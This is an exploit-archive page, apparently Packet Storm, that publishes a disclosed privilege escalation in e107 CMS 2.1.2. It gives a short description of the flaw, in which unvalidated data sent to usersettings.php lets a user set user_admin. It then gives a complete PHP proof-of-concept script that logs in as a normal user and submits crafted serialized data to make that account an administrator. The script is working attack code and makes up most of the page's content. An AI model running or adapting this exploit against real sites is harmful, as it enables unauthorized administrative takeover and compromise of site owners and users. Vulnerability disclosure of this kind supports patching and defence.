Exploit the possiblities

e107 CMS 2.1.2 Privilege Escalation

e107 CMS 2.1.2 Privilege Escalation
Posted Nov 9, 2016
Authored by Kacper Szurek

e107 CMS version 2.1.2 suffers from a privilege escalation vulnerability.

tags | exploit
MD5 | 20603bb3632e7a19654f23b0e5c6ca1a

e107 CMS 2.1.2 Privilege Escalation

Change Mirror Download
# Exploit Title: e107 CMS 2.1.2 Privilege Escalation
# Date: 09-11-2016
# Software Link: http://e107.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

Datas from `$_POST['updated_data']` inside `usersettings.php` are not properly validated so we can set `user_admin`.

http://security.szurek.pl/e107-cms-211-privilege-escalation.html

2. Proof of Concept

<?php

/**
* e107 CMS 2.1.2 Privilege Escalation
* Kacper Szurek
* http://security.szurek.pl
*/
function hack($url, $login, $pass, $cookie){

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' => $login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
curl_setopt($ch, CURLOPT_POST, 1);
$content = curl_exec($ch);
if (strpos($content, '?logout') === false) {
die("Cannot login");
}

$data = array();
$data['user_admin'] = 1;
$data['user_perms'] = 0;
$data['user_password'] = md5($pass);

curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' => base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)), 'currentpassword' => $pass)));
$content = curl_exec($ch);

if (strpos($content, 'Settings updated') === false) {
die("Exploit probably failed");
}

die('OK!');
}

$url = "http://url_here";

// Standard user credentials
$user = "login_here";
$pass = "password_here";

$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    15 Files
  • 15
    Dec 15th
    28 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close